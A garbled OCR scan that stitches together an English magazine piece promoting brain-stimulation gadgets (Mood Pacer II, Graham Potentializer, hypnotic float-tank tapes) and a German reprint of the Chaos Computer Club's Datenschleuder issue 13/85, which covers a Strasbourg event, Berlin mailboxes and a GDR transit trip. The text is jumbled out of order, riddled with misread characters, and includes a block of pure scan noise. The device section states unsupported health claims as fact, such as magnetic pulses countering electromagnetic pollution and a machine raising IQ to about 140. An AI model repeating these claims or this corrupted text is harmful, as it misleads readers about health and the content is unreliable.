they seem to actually entrain the brainwaves of many people. O n e s u c h device now available is the M O O D P A C E R I I . Unlike the neuro e l e c t r i c stimulation devices, the Mood Pacerdocs notrequire electrodes attached to the head or body. In fact, the field produced by the pacera wireless, battery-powered box about the size of a bar of soapcan be e f f e c t i v e several feet from the dcvice. However, while virtually everyone is affccted by direct electrical stimulation, it seems that only a b o u t 3 5 percent of subjects tested are sensitive to magnetic brainwave p a c i n g . W e have already discussed the possible benefits o f entraining brainwaves throughout the whole brain. It should be noted that the M o o d P a c e r II pulsatesand entrains brainwavesat a frequency o f 7,83 H z . T h i s is also known as the "Schumann resonance." This has been found to b e o n e of those " w i n d o w " frequencies that appear to have a wide r a n g e o f beneficial effects on humans, ranging from reports of enhanced h e a l i n g to accelerated learning. W h e n a biological system vibrates at this frequency, it can be said to be in a state of resonance orentunement w i t h the planet's own magnetic frequency, and it is perhaps this rhythmic u n i t y with what has been called the earth's "natural brainwave" that produces such profound effects. Bob Beck explained it in terms o f B o h m ' s theory of the holographic b r a i n " I f you can ping a specific element o f that hologram you can ping the entire structure," said Beck. " I n this case, u sing this weak pulse at 7.83 H z you can ping the whole structure and h a v e very dccided effeets." In addition to entraining brainwaves, the magnetic pulse generator seems tohaveothcr benefits. In recentyears our civilizationhas i m m e r s e d itself in a dense electromagnetic " s m o g " of conflicting electromagnetic interference and man made radiation "noise," including microwave a n d radar, causing our cells to lose contact with many natural micropulsations and electromagnetic fields. Research has proven that this electromagnetic pollution can have a wide range o f harmful effects. As B o b to feci any electrical tingling, but when used for 20 to 40 minutes while remaining quiet, preferably in a meditative state, the effects are striking and long lasting. Most users experience an immediate sense of change. Experienced meditators claim it helps them enter the deepest meditative states very quickly. It has also proven effective in producing focussed, highly alert states effective for reading or work. A recent issue of the Psychotherapy Newsletter was largely devoted to an exploration and discussion of this device, and the authors noted that it seemed effective in reducing blood pressure of hypertensives, reduced anxiety, produced a state similar to a mild hypnotic trance, increased ability to concentrate, and they concluded it "may well revolutionize the practice of psychotherapy by making significant inroads into the use of biofeedback and chemicals as adjuncts to 'the talking cure."' to E M fields." But to magnetic pacers can apparently act Beck as a described it to me, " M a n as a biocosmic resonator is extremely sensitive countermeasure this environmental electromagnetic pollution.

Although the signal strength of the pacer is slight (only milliwatts, or thousandths of a watt) there seem to be mechanisms in living tissue, s u c h as long-chain liquid-crystal dipoles, that exhibit superconductive characteristics that allow the PEMFs to override the destructive environmental electromagnetic noise pollution. Because the device is close to the user's body, its weak signal overrides much stronger sources a t a distance. Many inventors and others involved in the use o f E M dcvices b e l i e v e that the F D A and other powers that be arc try ing to suppress the use o f such dcvices. As Bob Bcck told me, " A t this point we could be o n t h e verge of a giant step in human evolution. W e ' r e only operating at a s m a l l percentage of our potential, and E M stimulation can have p o w e r f u l effects. However, vested interests are always opposed to change, w h e t h e r it's free energy or a better carburetor. But more and more people are becoming aware of the possibility of these things. There's an e x p l o s i o n of information. At this point an informed public is the best s a f e g u a r d . "

Endomax
Electronic Sedative or Stimulant

T h e

Endomax,

recently

described

in

Magical

Blend

(Issue #15), plugs into a

Walkman-like cassette player. A n endless tape loop plays in the cassette player, but there is a special adaptor that transforms of the tape into the sound electrical frequencies

frequencies that are delivered to the brain through electrodes placed on the mastoid bones. Thus far inventor Ted Alsop provides four different tapcs/frequcncies: one stimulating the release of endorphins, one to trigger the mood elevating neurotransmitter norepinephrine, one releasing sedative neurotransmitters that are our natural Valium and Librium, and one which is an energizing stimulant, releasing norepinephrine as well as dopamineor so Alsop claims.

AlphaPacer
II Altered States of Consciousness

This recently developed dcvice is billed b y its inventor, Keith Simons, as "the u l t i m a t e brainwave entrainment dcvice." It uses a variety of mind altering forces to allow the user to control, or "entrain" brainwave activity First, it uses a very low amplitude sine w a v e that is very similar to that of the Alphatronic U l

which is sent directly into the brain via several electrodes placed o n t h e head. To that it adds a P E M F that pulsates at the same frequency as the electronic signal. In addition, it uses stroboscopic lights and p u l s a t i n g sounds in synchronous rhythm with the electrical wave and P E M F Simons claims that "the more sensory inputs into the central n e r v o u s system that are synchronized at the same frequency, the greater the entrainment produced." Since the Alphapaccr 11 can be adjusted to frequencies in b o t h t h e alpha and theta range, it is quite efficient in producing altered states o f consciousness that feature colorful visualizations, intense and spontaneous memories, deep relaxation, sudden creative insights, and so o n

Mood Pacer II
Enhanced Healing & Accelerated Learning

O n e technique of electrical stimulation that has aroused great interest among scientists in recent years is the use of pulsed Used by electromagnetic fields (PEMF).

increasing numbers of orthopedic surgeons to combat such common bone diseases as osteoporosis and
" u n u n i t e d "

fractures (broken bones

that won't heal) P E M F also seem to have the property o f entraining or "pacing" the body's cells by activating sensitive neuronal receptors. W h e n these P E M Fs are tuned to frequencies in the human E E C range,

As babies we are rocked. As kids we roll down hills, spin until we're dizzy, ride roller coasters. As adults we scuba dive, skydive, hang glide, drive fast, dance like mad, and, The Pleasures when tired, sit in rocking chairs. According lo of Merely elccirical engineer/inventor David Graham, Circulating such movements arc nol only fun but essential: they stimulate our brains, and, in high doses, they can increase intelligence. He has invented a device, the Graham Potentializcr, to do just that. The device appears to be a modest cot with a motorconcealed beneath it, and a large box at the head. As the user lies back on the cot the cot revolvesthe user rises and falls rhythmically through a circle. The movement is smooth, and feels very good. With each cycle the user revolves through the electromagnetic field produced by the box at the cot's head. EEG studies of the effects of the device indicate that the machine induces sharp increases in the production of slow brain waves, shifts hemispheric dominance (resulting in a balancing of the two hemispheres), and, most intriguingly, optimizes the neural efficiency quotient (NEQ), a measure of how rapidly electrical signals are transmitted by the brain's neuronsa characteristic that has correlated very closely to 1Q scores. Says Graham, the device "can increase the intelligence or mental fu nctioning of a normal adultsomeone with an average 1Qlo an 1Q of about 140-145."

Graham Potentializer:

"because there is simply too much information to process consciously." Unable to focus on either story, your conscious mind seems to let go or turn off. Using the hypnotic techniques of Milton Erickson, with elements of neurolinguistic programming, Glauberman and Halboth have loaded the talcs with a variety of powerful suggestions, though the suggestions are couchcd in indirect terms and seem simply part of the story, so that they go undetected. Also, since the mind can at best focus on one of the stories (and usually gives up and stops paying conscious attention altogether), most of the stories themselves, and the hidden messages they contain, bypass the consciousness entirely, entering the unconscious mind. Totopoff this barrageof informational overload, yet another seriesof suggestions has been imbedded in the tapes by an imaginative combining and interweaving of words and phrases from the two separate sound tracks in such a way that they can only be perceived peripherally by the combined functioning of both brain hemispheres. Thus far Glauberman and Halboth have created a series of 14 tapes (with applications that include increased creativity, enhanced problem solving abilities, weight loss, stress management, improved time management and reduction of smoking and drinking, among others). Most of their clicnts float oncc a week while listening to the appropriate tapes. In a recent informal study of these subjects, Glauberman and Halboth discovered that the combination of the tank and the tapes "had a definite and profound impact on everyone." I personally have tested these tapes out on a variety of individuals and have been impressed with their effectiveness. Often, the responses to the tapes were unexpected. "One man was coming to me for depression," says Glauberman. "A few days after listening to a tape, he came to me with excitement and told me that the panic attacks he had whenever he came into New York had abruptly disappeared. Well, he'd never even told me he was having these attacks! I looked over the peripheral messages on the tape he'd heard and found that one of the tales mentions offhandedly that the central character, who is exploring a magic city, 'felt comfortable now in the city.' Apparently the man's subconscious had felt the need for that change and had somehow opened itself up to that specific message from the tape. This suggests that an unconscious scanner is at work to select indirecthypnotic or subliminal messages that have meaning for the person's life." Though designed to be used in the float tank, it has been discovered through extensive experimentation that the HPP tapes are equally effective when any tool is usedSynchro Energizer, Graham Potentializer, etc.that is effective in putting the user in that state of extraordinary rcccptivity to new information and to behavioral change or "rcimprinting" that accompanics the thcta state.

To explain these benefits, Graham suggests that the rotating affects the fluids that compose about 90 percent of our body volume, and particularly the fluids of the vestibular or inner ear system. 'The millions of nerve endings in your inner ear," says Graham, "respond to movement with electrical responses that are carried throughout the brain, triggering an enormous amount of neural activity. This neural activity is of an uncommon sort, not only stimulating many different parts of the brain, but causing the neurons to forge new connections. So what the rotation is really doing is 'exercising' the brainaltering and increasing the flow of neuroelectricity and neurochemicals to large areas of the brain. The first thing this kind of vestibular stimulation docs is bring about a dramatic increase in your motor and learning capabilities. In other words, the 'exercise' has a brain building effect, just as physical exercise has a bodybuilding effect."

HypnoPeripheral Processing
Overloading the Conscious Mind

One mind altering tool many of us are familiar with is the flotation tank. One of the variety of ways flotation can boost learning abilities is by dramatically increasing the floater's receptivity to new information. Now, New York psychologist Dr. Lloyd Glauberman in collaboration with neuropsychologist Dr.

To leam more about brain boosting devices, including addresses of manufacturers, and for further information, including news of new devices and the latest research in the field, write: MEGABRA1N, P.O. Box 1059, Cooper Station, New York, N Y , 10276. For an in depth accountof brain-altering t e c h n o l o g y , c o n s u \ t M e g a B r a i n : N e w T o o l s a n d Techniques for Brain Growth and Mind Expansion,

Phil Halboth has developed a new way of using the hyper-receptivity induced by floating: he has created a series of extraordinary audio tapes specifically designed to be heard while in the flotation tank. The tapes use state-of-the-art digital recording technology incorporating the latest research in information processing and lateralization of functions in the brain hemispheres to present messages stimulating rapid and dramatic behavioral change, in a technique Glauberman and Halboth call HYPNO-PERIPHERAL PROCESSING. Once in the tank, and wearing stereo headphones, you hear calm voices against a background of stately, soaring synthesizer music gently guiding you into a deeply relaxed state. Then the soundtrack divides and you hear a separate voice in each ear, each voice narrating a different fairy-tale-like storycharming tales of wizards, magic cities, intergalactic zoos, mystic shoemakers and dream machines. "The simultaneous input overloads the conscious mind," says Glauberman,

BRAIN-TECH heit eine junge Firma in Heidelberg (Panoramastrae 29), die sowohl das Buch MegaBrain vertreibt wie auch einen Grne Groteil der hier beschriebenen Gerte. BRAIN-TECH ist auch der Titel eines Buches zum Thema, das innerhalb der Reihe Der Zweig im Winter 1988 erscheinen wird. Was hallen Sie als Auenstehender von Intelligenz?

.. .nachdrcklich empfohlen
Hier sind sie, die lang erwarteten Nachdrucke von datenschleuder 13 bis 25. Diesmal ist wohl keine Panne passiert wie bei Teil 1 der Hackerbibel; dort war ausgerechnet in der allerersten Ausgabe der Datenschleuder bei den Aufgaben fr die nhere Zukunft" der Punkt 10 Alles was Spa macht und nichts kostet" unter Totenkpfen verschwunden. Weggelassen wurden diesmal - absichtlich - nur berholte Bestellfetzen. Geschaffen nach dem Vorbild der tap und trotzdem anders - siehe Hackerbibel Teil 1 - wurde die Datenschleuder, das wissenschaftliche Fachblatt fr Datenreisende im Orwelljahr 1984. Jetzt erscheint sie im fnften Jahr. Die Zeitschrift wurde und wird ehrenamtlich produziert. Die einzigen, die bezahlt werden, sind die Post frs Porto und die Drucker (und letztere nicht immer sofort - danke frs Verstndnis!). Die Datenschleuder ist in vielem unblich und jede Ausgabe bringt eine neue Mischung mit amsantem, brisantem, aktuellem oder aktuell werdendem Material aus der Welt der Datenreisenden.

Wir wnschen viel Spa bei der Lektre!

C9927F DM 2,50

atcitsrijlcui>cr
Oktober-Ausgabe Nr. 13/85 Das wissenschaftliche Fachblatt fr Datenreisende
Im November Ein O r g a n des Chaos Computer Club erscheint 14185 * Schwerpunkt Frauen und Computer

t*

\! / f
macht mobil:'

EURO NOTRUF Die technologische Herausforderung


Das Euro-Parlament (EP) stellt seine nchste Sitzung in Strassburg vom 7. bis 11. Oktober 1985 unter das Motto "Die technologische Herausforderung". Neben einigen eigenen Berichten und Debatten ber die "Herausforderung" von USA, Japan und dem Pazifik-Becken findet ein Symposium und eine AUSSTELLUNG statt. Auf ihr sind allerlei europische Firmen mit ihren Robotern und hnlichem vertreten.
Unter a n d e r e m ist g e p l a n t : 1) Z e h n B e r i c h t e d e s P a r l a m e n t s u n d D e b a t t e n zum Thema neue Technologien: ' Europa gegen Usa/Japan " ein europischer Forschungsraum ' d i e t e c h n o l o g i s c h e n P r o b l e m e , d i e sich a u s d e m Beitritt von S p a n i e n u n d P o r t u g a l e r g e b e n ' Technologietransfer " d i e A u s w i r k u n g e n d e r n e u e n T e c h n o l o g i e n fr die e u r o p i s c h e G e s e l l s c h a f t ' d i e s o z i a l e n A u s w i r k u n g e n der n e u e n T e c h nologien ' neue Technologien und Schulbildung ' europisches Technologiefclgeabschtzungsinstitut (tolles Wort) " europ. Weltraumpolitik " neue Technologien im Transportbereich ' F r a u e n und n e u e T e c h n o l o g i e n 2) A l l g e m e i n e R e d e - O r g i e v o n D i e n s t a g bis Mittwoch S y m p o s i u m mit e r l a u c h t e n u n d e r w h l t e n Gsten v o n Lothar S p a e t h b e r d e n Chef v o n Olivetti, der EG. C i b a - G e i g y . Battelle-Institut. allerlei Computer- und sonstigen Wissens c h a f t s z e i t u n g e n , DGB. C E R N na und so w e i t e r u n d so fort, blo k e i n e e i n z i g e k r i t i s c h e S e e l e . Wir k n n e n d a s l e i d e r nur b e r V i d e o v e r f o l g e n , d a w i r w o h l a l l e nicht e r l a u c h t g e n u g s i n d . T e i l w e i s e sind d i e L e u t e g a n z i n t e r e s s a n t , e b e n so der Tross von ausgewhlten und eingeladen e n F a c h j o u r n a l i s t e n a u s g a n z Europa. Ausstellung: europ. Weltraum Agentur. Airbus. S i e m e n s . AEG. tvlax Planck. T h o m s o n . Bull. P h i l i p s / S i n c l a i r . B a y e r . H e n k e l usw. 50 U n t e r n e h m e n zu C o m p u t e r . T e l e k o m . B i o t e c h n i k , alt e r n a t i v e E n e r g i e t r g e r . W e l t r a u m . L a s e r ... ESPRIT: EURONET-DIANE. JET: RACE; u n d w i e die Europrogramme alle heissen. Auch dabei d i e I n f o r m a t i k - A b t e i l u n g v o n EG u n d EP. Uns g e h t es d a r u m , zu z e i g e n , da C o m p u t e r nicht nur e i n e S a c h e d e r g r o e n F i r m e n fr Rationalisierung, berwachung. Kontrolle, S t e u e r u n g etc. sind. H i g h T e c h n o l o g i e ist a u c h l o w d o w n o n the b a s e w i c h t i g . N e b e n d e m blichen von-oben-nach-unten oder untennach-oben. d e m zentrallstischen der neuen Technologien gibts auch dezentrale Mglichk e i t e n , e i n k r e u z - u n d - q u e r lr m e n s c h l i c h e B e d r f n i s s e . A u c h d e r F o t o k o p i e r e r ist nicht einf a c h ein H e r r s c h a f t s i n s t r u m e n t , s o n d e r n a u c h das Ende bestimmter Zensurformen. Langsam, a b e r s i c h e r e n t s t e h t bei d e n n e u e n T e c h n o l o gien eme Gegenkultur. B i s h e r d e n k e n d i e F r e a k s oft g e n u g nur n e u e P r o g r a m m e u s w . a u s u n d b l i c k e n (nur!) d a durch, aber eine K o m m e r z m a f i a vertreibt und k o n t r o l l i e r t d a s g a n z e in g r o s s e m Stil. Da s t e l l t s i c h d i e E i g e n t u m s f r a g e aus d e r S i c h t d e s S y s t e m e n t w i c k l e r s u n d der G e s e l l s c h a f t : W e m gehrt eigentlich das ganze Wissen, das da akkumuliert w i r d ? Sind Informationen eine W a r e w i e j e d e a n d e r e a u c h o d e r steckt in i h r e r E r s c h e i n u n g s f o r m , a b e r a u c h In der g a n z e n Umstrukturierung von Kontrolle. Steuerung, Wissen = Macht usw. eine neue Melodie? Radik a l e f f e n t l i c h k e i t , f r e i e r Fluss v o n Daten u n d I n f o r m a t i o n e n ist d o c h v i e l effektiver von g e r e c h t e r g a n z z u s c h w e i g e n ! Und w o h i n g e h t d i e R e i s e , g e n a u e r : W e r w i l l w o h i n ? In Diskussionen wollen w i r darber nachdenken und G e g e n p u n k t e s e t z e n i m A n g e s i c h t der e u r o p i s c h e n H u r r a - P a t r i o t e n , d i e nicht mal mit n e m T a s c h e n r e c h n e r u m g e h e n k n n e n , aber s t n d i g " B e k e n n e n " , dass "die" neuen Technologien tierisch wichtig w r e n , berall eingefhrt w e r d e n m s s e n und E u r o p a s i c h g e g e n USA. J a p a n und das ganze pazifische Becken durchsetzen msse, k o n k u r r e n z m s s i g & blind. Nur r e d e n g e n g t nicht, klar: aber d e r Erfahr u n g s a u s t a u s c h ist w i c h t i g . Aha-Erlebnisse gibts, wenn w a s nicht oder anders funktioniert a l s v o r g e s e h e n . N e a n d e r e Frage, keine Frage, ist d i e D a t e n s i c h e r h e i t in Europa: w i e d e r n e a n d e r e d i e B o r n i e r t h e i t v o n B r o k r a t i e n w i e der Deutschen Bundespost und verwandten europ i s c h e n V e r e i n i g u n g e n . Eine ganz b a n a l e Ges c h i c h t e , auf d i e d i e e i n i g e e u r o p i s c h e P a r l a mentarier scharf sind: die EG-Kommission verw e i g e r t i h n e n k o n s e q u e n t d e n Z u g a n g zu bes t i m m t e n i n t e r n e n D a t e n b a n k e n . Dabei soll d a s Parlament doch gerade kontrollieren! W e n n d i e n u n m a l s e h e n k n n t e n was sie nicht sehen sollten. by h.

Das CHAOS-TEAM

Zusammen m,t den Kollegen vom KGB (Mnchen) partyzipiert das CHAOS-TEAM vom 7. bis 9. Oktober an der EP-Sitzung In Strassburg und besetzt ein Bro. Dort und In der U m g e b u n g wollen wir unsere Interessen und Ansichten zu den neuen Technologien nutzen und diskutieren. Whrend dieser Zeit Ist das CHAOS-TEAM a m Daten-und Telefonnetz erreichbar. Gezeigt wird Mailbox-Kultur und Anstze zu einer Informationsgesellschaft von unten sowie Berichte ber Machtumverteung durch Nutzung neuer Technologien. Die Teilnahme des Chaos Computer Club am Bldeltextsystem der DBP (Btx) hat verdeutlicht. was alternative Informationsdienste in neuen Medien machen knnen. Das ist mehr als nur Salz in der kommerziellen Suppe. Jetzt fhren zunehmend Firmen Mallbox-Systeme zur Sachkommunikation (Bestellwesen u..) ein, ohne die-HIntergrnde und d i e Vernderungen von Informationsstruktur und der Datentlsse i m einzelnen zu erkennen. Gerade die elektronischen Briefksten und Schwarzen Bretter verformen die bisherigen Machtstrukturen. da jeder Teilnehmer (ohne an einen Amtsweg gebunden zu sein) direkt agieren kann. Manch kleiner Sachbearbeiter merkt durch die neue Anschaulichkeit Im Datenflu, da sich etliche Vorgesetzte nur durch das Weiterleiten von Ideen der unteren Chargen auf ihren Posten behaupten. Doch auch die negativen Folgen, die sich durch das elektronische berwachen von Privat-Post in Mailbox-Systemen ergeben, mssen analysiert werden. Erfahrungen ber "Postkriege" in greren US-Firmen liegen vor. Weitere Themen und Anregungen fr die Straburger Euro-Party: ' Datenbarken der EG. zu denen das EP keinen Zugriff hat und was dort alles drinsteht ' "Volks-Computer": Mailboxen-Kultur etc. ' Neue Techniken bei Grnen und Alternativen ' Chancen neuer Technik bei der Aufdeckung von Skandalen a m Beispiel von Greenpeace ' Die Postverwaltungen: Hter sozialer DatenGerechtigkeit oder Hanswurst gegen die Medienund Datenkonzerne " Daten: Grenzberschreitungen und Hindernisse ' Praktische Kritik an sinnloser Computerisierung " und so weiter und so fort. Der Phantasie sind wie i m m e r nur die eigenen Grenzen gesetzt. Ideen. Anregungen. Texte. ... an CHAOS-TEAM ber die Datennetze. Mglichkelten des Bros werden genutzt, um diese Anliegen zu verbreiten. Ausfhrlicheres Programm liegt noch nicht vor. Es wird alles schon irgendwie klappen. Termin: Mo.. Die. und Mittwochvormittag. Werft eure Imaginationsmaschinen an! et e u r o p a 1 3 . w s 850929 2140

Strassburger Euro-Party

INHALT: Inhaltsverzeichnis Datenschleude 13/85 1 EUROPA: die Europa-Seite mit e i n e m Euro-Nolruf, Treffen in Straburg, Euro-Party von Computerfreaks. 1 CCORTS: Zahlen. Daten. Fakten. Adressen. 2 TRANSI: Berlin und die Welt: Chaos mobil - ein Reisebericht. 2 KULTUR: Mailboxen in Berlin. 2 POSTAN: A m IFA-Poststand. Furunkelausstellungsbesuchsbericht. 2 WELTDS: Die Welt a m Samstag. Drucker&Rolls Royce von Becker. 3 ATA520: Der 520er. Innenleben und Umfeld. 520 DatensalTOS. 3 ATACHA: Standardisierte Vernetzung worldwide: Chaos-Plne. 3 BASTAR: Der Bastard-Blitz. Ein Bndel A T A R I - A n w e n d e r . 4 ISDNOB: Post Future? 4 BUCHSE: Heynes Halbschnellschu. Militr g e g e n Hacker. N e t z w e b e r . 4 IMPRES: Das Impressum. I m m e r w i e d e r aktuell. 5 COSYPG: Das Cursor Operation System. 5 KIWIPG: Schnheit in Watten. Ein neues Buch. 6 FMANLA: Die Katze darf d a s Telefon abheben. Mailboxrecht. 6 GEBUER: Der Gebnrenprfer schlug zu. 6 DIGDNK: Digitales Denken. Ein mahnender Artikel. 6 BURKHA: Schmierkram. 6 GELDPR: Eine Geldscheinfressergeschichte. 6 POSTEF: W a r u m die Post Probleme b e i m Briefkastenleeren hat. 7 77????: Aus der Hackerbibel entlernte Werbeseite. 8 K U R Z Z Z : Kurzmeldungen. 8 M LH AN: Wohin steuert die Welt. Eine Buchrezension, o IFA-85: Einem groen Teil dieser Auflage liegt die ds-Ausgabe zur IFA'85 als dreiseitige R c k s e i t e bei. Wir bitten u m g n d i g e Beachtung. inhalt13.ws 850930 1845

AMD N O W A S O M B O U T HOW T z c H N O L o q Y
CRUSHES YORSOVl...

Ol

c 2 o S < I g D C o r O g r\j (f> -Q.J in c rc


T

vi ~ UJQ N . -LT) XC O O C Q 5 m

Ei ra ' . ? TZ < J i i d

. ra h.EU oi in w f i

'S,

l i E i c w O - c u < in

o-g .

ra r. uS o m o ^ <9 L2 C i; D 0) c o O w ; ''Si O 5 j i o s o S rCL-Kc o ! , S

^ . c / ^ s c o S S i S ^ S S 0 c 2= 1 l."^ w i 8, B C O C0 i , w ai^- n rnik .r f > _ 3 ro > OKU 2 O 5 . ! o ^ s i p S t r ^ e S S S n i s S g i i o i s g S

. o " -g c y g e : o ' j . 1 o o S rrtsn V) 1 -1- ~ s ' f - :3 ^ S t 0 rr O ^ . ^ o S 3 3 2 O U = 0.m U U c U U U U U < o I O < K J t r r < o o o o o o a . c o o

[Jatcnrfjlcubet]
WS^SSS^IPBSWSPBM

Hilferuf
ap N e w e n t - Der Englnder F r e d e r i c k C o o p e r (87) i n N e w e n t w u t e , w a s z u t u n w a r , als er m i t einer Schere in einer B a u m k r o n e sa u n d d i e L e i t e r p l t z l i c h umfiel. Er zog sein schnurloses Telefon aus der Tasche u n d rief d i e F e u e r w e h r an. D o r t hielt m a n seinen A n r u f fr einen Scherz. E i n e halbe S t u n d e spter rief d e r M a n n die Polizei an, die zwei Beamte schickte. I c h w a r in m e i n e r J u g e n d Pfadfind e r " . sagte C o o p e r zu i h n e n .

enoiw

ziwoiul uoy

( n i i l t y m s

}T
Chaos mobil

N r . 13/85
Hey Freaks. Hacker, Craecker und sonsiige Unruhesliiler Oa Ihr anscheinend alle der Meinung seid. Berlin sei das Centrum der deulschen Mailbo*-Scene. w e r d e n euch nun einige Gesichtspunkte dieses Anliegens nahe gelegt Einige von euch sind der Ansicht, hier gaebe es Mailboxen, w o man in e i n i g e n Rubriken lachen kann, in anderen reden bis m a n schwarz vor Schilling w i r d und m wieder a n d e t e n sein Inlormalionsmveu kultivieren kann Leider bedarf es s i c h euch zu enltaeuschen. In Berlin gibt es zur Zeit mehr als 20 Mailboxen, aber nur 5-6, s i n d akzeptabel. Der e r b a e r m c h e Rest zaehlt sich z u den w a h r e n Mehlboxen, d e r e n Besuch nicht zu lohnen scheint. Die richtigen Berliner Freaks treffen sich ausschliesslich i n d e n anerkannten Boxen, wobei nicht zu unterstellen sei, da d i e nicht ernslzunefimen sind, die d i e anderen Boxen aufsuchen Grob lassen sich die Berliner User in 5 Kategorien einordnen: 1. Die Begeisterten' Das sind d i e Leute, die zuviel Geld haben und fast taeglich d e m Grlb ihr Bahres opfern, indem sie jede Box besuchen um zu sehen ob sich was geaendert hat, jedoch selten etwas kreatives leisien .. 2. Die S t i m m u n g s m a c h e r Das sind llspr.die alle paar Tage m ihre Stammboxen schauen und nichts besseres zu tun haben, als jeden den s i e erwischen. anmachen und verarschen. Also Typen, de jeden versuchen ubers Ohr zu hauen, w a s sogar dazu fuhren kann, dass sie aus der Mailbox fliegen. 3 Die Ernsten- Das w i e d e r u m sind Leute, die jede Woche mal m d i e Box reinsehen u m mit den Problemen des Alltags die armen Halbleiter voll zumllen Ernst zunehmende Kreativitaet ist dabei allerdings nicht wahrzunehmen. 4 Die Kinder Das sind Troopies und Halbstarke, die nur hineinschauen u m z u kontrollieren, ob s i e auch ja noch im Besitz der neuesten Comoutergames sind, sie g e h e n natuerlich in keiner Weise auf andere e m 5 Die Hacker Dies sind homo sapiens, deren einzigstes Interesse aus den neuesten Passwrtern und Nuas beslent Mit ihrem nicht e n d e n d e n Informationshunger w e r d e n die M a i I b o * e n erst z u einem r e u e n interessanten Medium. Mailboxen sind natueriicn nur so gui w i e i h r e SysOp's. was oft vom Alter und den P r o g r a m m i e r kenntnissen der Typen abhangt. Da gibt es m Berlin nun rund 20 Boxen, von denen ca. 12 mit d e r gleichen Software laufen, und die SysOp's zwischen 14 und 17 Jahren alt sind. Die meisten Mailbonen laufen auf C-64 mit z Teil 2-3 Floppys. andere wiederum benutzen PC's mit Festplatten. Was ist nun so interessant an d e n Berliner Boxen? - Eine Umfrage ergab, da die Sexecke (nur in einer Box vorhanden) knapp vor den Pinboards fuhrt, welches sonst immer ganz vorne steht. Danach lolgen d>e Rubriken wie Usergroup. Hackergroup, Infos, Soll/Hardware-Benchte. Erfahrungsaustausch (was immer darunter zu verstehen sei...), Berichte aus der Bundesrepublik und d i e lebensnotwendigen Informationen des Daten Netzes. In der Sexecke gibt es inzwischen schon richtige Fortsetzungsromane von Dr Know Charlotte i m Taumel der Lust, w a s bei einigen Usern der absolute Renner z u sein scheint Hier einige N u m m e r n (Berlin Vorwahl. 030) CIZ 611B502/ Teletex! 7850500/ Gerbnet 4144068/ Compac 8024228/ Coko 4652439/ CCS 7066173. by e d e w o r k e d Oy o b e l i x . t.onuri3wsa50930 i e n

Transit durch die DDR Fehler beim BKA


O n t h e road. Auf d e m Weg v o n H a m b u r g n a c h B e r l i n , kurz hinter d e m Horner K r e i s e l . 5 L e u t e i m G r a n a d a . nicht ganz o p t i m a l , g e h l aber. Wir e r r e i c h e n d i e G r e n z e (West) mit der M u s i k ihrer Herren, der amerikanischen Nationalhymne. Rechtzeitig z u m DDR-Grenzposten k o m m t d i e russische, d i e gefllt mit besser. T r o t z d e m m s sen wir w a r t e n , z w e i von u n s h a b e n k e i n e Psse, e i n e r davon nicht m a l e i n e n h e i l e n Perso. "Hier Haben S i e Ihre v i e r D o k u m e n t e und e i n e n Lappen..." meint der G r e n z e r , der d e n T r a n s i t d e s h a l b v e r w e i g e r t M a n hatte d i e Seite d o c h v o r h e r e i n k l e b e n sollen. Bei d e r Rckfahrt von d e r Nichttahrt e i n e k l e i n e Kontrolle d u r c h u n s e r e g r n e n J u n g s . Jetzt w e r d e n fnf L e u t e d u r c h v e r l a l i c h e B e a m t e als Berlin-Rckkehrer g e s p e i c h e r t . D a s ist n a t r lich Unfug, d e n n vier f a h r e n g l e i c h d a r a u f hin. Nur einer m u nach H a m b u r g z u r c k t r a m p e n und sich einen neuen A u s w e i s b e s o r g e n - D a s ist gespeichertes CHAOS i m B K A - C o m p u t e r . Da hilft auch k e i n e R e c h t s s c h u t z v e r s i c h e r u n g . Fr uns vier das g a n z e nochmal. K a s s e l t e mit N a t i o n a l h y m n e n rein, Passe raus, w a r t e n Nachdem d i e Identitt des P e r s o i n h a b e r s mit sich selbst durch d i e Z a h l u n g von 10 M a r k besttigt w e r d e n w o r d e n ist, gehts z u v i e r t weiter. Das Telefon ist k e i n e m a u f g e f a l l e n u n d die rote K e l l e hatten w i r vorher zugedeckt. Der Fahrtkomfort ist seit d e r Grenze e r h e b l i c h gestiegen, m a n macht es sich g e m t l i c h . S m a l l talk. der Z i g a r e t t e n k o n s u m steigt. S c h i l d e r mit eigenwilligen Geschwindigkeitsbegrenzungen sowie das Z a h l e n vonn A u t o s i m W a i d m a c h e n d i e Fahrt z u e i n e m f a s z i n i e r e n d e n E r l e b n i s Wir w o l l e n a m Intershop halten, e i n e n Kaflee trinken, aber d a ist alles dunkel. M o n d und Nebel und e i n paar p a r k e n d e VEB-Lastei Wir f a h r e n w e i t e r . G e g e n e i n Uhr e r r e i c h e n wir d i e G r e n z e , d i e s m a l geht alles schneller. Dann B e r l i n , Quartiersuche ohne Stadtplan. Eine T e l e f o n z e l l e rettet uns, da die A u s s a g e n d e r P a s s a n t e n zu unklar w a r e n . Es lebe d i e Post. D e e p Der fnfte Mann fliegt Der T r a m p 2urck w a r gut, Em LKW-Fahrer, der r e g e l m i g DOR-Touren hatte, h i e l t gleich. Er e r z h l t e v o n s e i n e m Berufst ahrersitz. Auf bund e s d e u t s c h e n Straen g e h e n d e r a r t i g e Sit2e zu Lebenszeiten d e s LKW eigentlich nie kaputt. Auf DDR-Straen halten sie rund e i n Janr. A m nchsten M o r g e n w o l l t e er mit d e m Flugz e u g n a c h Berlin. Er schaffte es. i n n e r h a l b von 10 Minuten ( n o r m a l e Bearbeilungszeit: e i n e Woche) e i n e n neuen P e r s o n a l a u s w e i s auf d e r Meldebehorde zu bekommen. Das Flugzeug erreichte er noch g e r a d e so M e r k e : A u e n B e a m t e k n n e n sehnen sein. Sie m s s e n nur ein E i n s e h e n haben. U n d b r a u c n s t d u d r i n g e n d e i n e n n e u e n P e r s o u n d hast k e i n e W o c h e Zeit, brauchst Du keiner. B e a m t e n bestechen. D u buchst e i n e n e i n f a c h e n F l u g n a c h Berlin (nur hin) u n d gehst m i t d e m Ticket u n d d e i n e m kaputten P e r s o z u r M e l d e b e h r d e . Das

CCC- Berlin:

